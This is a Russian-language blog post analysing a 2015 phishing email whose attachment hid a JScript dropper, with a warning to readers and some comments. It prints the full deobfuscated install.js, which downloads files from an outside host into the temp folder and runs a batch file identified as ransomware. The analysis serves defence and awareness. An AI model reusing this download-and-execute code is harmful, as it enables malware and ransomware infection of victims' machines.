Анализ кода установщика вредоносов на jScript

Сегодня 27.10.2015 столкнулся с очередными "письмами счастья". Текст письма следующий:

 
Акт сверки(в приложении к пиcьмy).
Убедительная просьба до завтрашнего обеда выслать отсканированную копию подписанного с Вашей стороны экземпляра или же ваши замечания.
Хотели бы подчеркнуть, что за Вашей фирмой висит непогашенный платеж за август.

Файл представлял собой zip (акт_сверки_120951784.zip) в котором внутри .js, при этом расширение в имени стояло pdf, но за пробелами спрятано расширение js. Код JS не сложный, хотя и содержит много лишнего, сжат и содержит не читаемые названия переменных и функций. Я решил разобраться, что он делает.

Действия скрипта по шагам смотри далее...

Внимание, очередная атака через рассылку писем.

Сегодня 27.10.2015 столкнулся с очередными "письмами счастья". Текст письма следующий:

 
Акт сверки(в приложении к пиcьмy).
Убедительная просьба до завтрашнего обеда выслать отсканированную копию подписанного с Вашей стороны экземпляра или же ваши замечания.
Хотели бы подчеркнуть, что за Вашей фирмой висит непогашенный платеж за август.

Файл представлял собой zip (акт_сверки_120951784.zip) в котором внутри .js, при этом расширение в имени стояло pdf, но за пробелами спрятано расширение js. Код JS не сложный, хотя и содержит много лишнего, сжат и содержит не читаемые названия переменных и функций. Я решил разобраться, что он делает.

Действия скрипта по шагам:

• С помощью ExpandEnvironmentStrings определяет путь к папке %temp%\\
• Создаёт в папке скрипт install.js и записывает код, который в теле этого скрипта закодирован в base64.
• выполняет этот файл через WScript.Shell.Run

Вот текст файла install.js:

WScript.Sleep(46);
var E02B = "%temp%\\";
 
function CreateObject(a) {
    return new ActiveXObject(a)
}
var D3C5158E1E = CreateObject("WScript.Shell"),
    E02B = D3C5158E1E.ExpandEnvironmentStrings(E02B);
 
function A7A86A0482FA2(a, b) {
    var c = new ActiveXObject("MSXML2.XMLHTTP");
    c.open("GET", a, 0);
    c.send();
    WScript.CreateObject("Scripting.FileSystemObject");
    new ActiveXObject("Scripting.FileSystemObject");
    var d = new ActiveXObject("ADODB.Stream");
    fd41f99c0 = "Q8B7BAEFE15";
    d.Open();
    d.Type = 1;
    d.Write(c.ResponseBody);
    d.Position = 0;
    d.SaveToFile(b, 2);
    d.Close()
}
 
A7A86A0482FA2("domain/doc.css", "" + E02B + "doc_8774.doc");
WScript.Sleep(36);
 
function B57298ED2A3574(a) {
    D3C5158E1E.Run(a, 1, 0)
}
 
WScript.Sleep(85);
 
try {
    B57298ED2A3574("" + E02B + "doc_8774.doc")
} catch (a) {}
 
function C4A49BE2A48F(a) {
    D3C5158E1E.Run(a, 0, 0)
}
A7A86A0482FA2("domain/style.css", "" + E02B + "style.css");
 
A7A86A0482FA2("domain/inject.css", "" + E02B + "vbbf15fa9b.bat");
C4A49BE2A48F("" + E02B + "vbbf15fa9b.bat 47E94-10B0E-F94B3-D246A");

В коде скрипта install.js во время выполнения происходит следующее:

• С помощью ExpandEnvironmentStrings определяет путь к папке %temp%\\
• с помощью ActiveXObject("MSXML2.XMLHTTP") получает по урлу revault.me/doc.css текст ответа и записывает его в файл %temp%\\doc_8774.doc
• запускает его через WScript.Shell.Run

• Также получает по урлу revault.me/style.css текст ответа и записывает его в файл %temp%\\style.css
• с этим файлом ничего не делает, я так понял нацелено на то, что из временной папки файл подхватит браузер

• Также получает по урлу revault.me/inject.css текст ответа и записывает его в файл %temp%\\vbbf15fa9b.bat
• запускает его через WScript.Shell.Run

Данные файлы и урл уже проверялись за день до этого на VirusTotal, вот ссылки на результаты проверок файлов:

doc.css (Avast - Other:Malware-gen [Trj])
ссылка: virustotal.com/ru/file/f90c9accb27bdd2cc6ede160809d731d6c29ed06cb9017e8657115bdb30baa6a/analysis/1445941640/
style.css (Kaspersky - UDS:DangerousObject.Multi.Generic)
ссылка: virustotal.com/ru/file/6b6d83e4787817915086425ad20e96e45b87df0f1d68c5232ff55fcf50091f05/analysis/1445945047/

inject.css

 
AVG	BAT/Crypt	20151027
Agnitum	Trojan.FileCrypt.Gen.AAI	20151026
Avast	VBS:Runner-JK [Trj]	20151027
DrWeb	Trojan.Encoder.1418	20151027
Kaspersky	Trojan-Ransom.JS.Agent.ah	20151027
Microsoft	Ransom:BAT/Xibow.B	20151027
Qihoo-360	virus.bat.regautorungen.a	20151027

ссылка: virustotal.com/ru/file/d471003fb7e70ba098aed4b5db68e158eb8e67d54bf887586849f3f11fcf7d6e/analysis/1445940339/

Судя по данным VirusTotal - первый троян, второй просто опасный по версии Касперского, а последний шифрует файлы.

Будьте бдительны. :)

Комментарии

Настройки просмотра комментариев

Выберите нужный метод показа комментариев и нажмите "Сохранить установки".

Результаты работы этих скриптов с скринами

Народ уже активно обсуждает на форуме касперского:
forum.kaspersky.com/lofiversion/index.php/t336262.html

Gmail уже определяет угрозу.

Зашёл через веб интерфейс Gmail - пишет "Антивирус: 1 вложение содержит вирус или заблокированный файл – скачивание запрещено."
Базы пополняются...

Отправить комментарий

  • Доступны HTML теги: <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Строки и параграфы переносятся автоматически.

Подробнее о форматировании

Image CAPTCHA
Enter the characters shown in the image.
Поделиться: